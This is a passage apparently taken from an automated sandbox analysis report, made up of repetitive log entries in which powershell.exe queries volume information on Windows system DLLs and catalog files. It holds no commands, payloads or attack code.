      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\assembly\GAC\Microsoft.mshtml\7.0.3300.0__b03f5f7f11d50a3a\Microsoft.mshtml.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure.CimCmdlets\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.CimCmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Management.Infrastructure\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Activities.Presentation\v4.0_4.0.0.0__31bf3856ad364e35\System.Activities.Presentation.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.LocalAccounts\1.0.0.0\Microsoft.PowerShell.LocalAccounts.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package02~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package0413~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.Windows.StartLayout.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.Windows.StartLayout.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0214~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\Whea\Microsoft.Windows.Whea.WheaMemoryPolicy.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0210~31bf3856ad364e35~amd64~~10.0.19041.1.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package04112~31bf3856ad364e35~amd64~~10.0.19041.1165.cat VolumeInformationJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\WindowsSearch\Microsoft.WindowsSearch.Commands.dll VolumeInformationJump to behavior
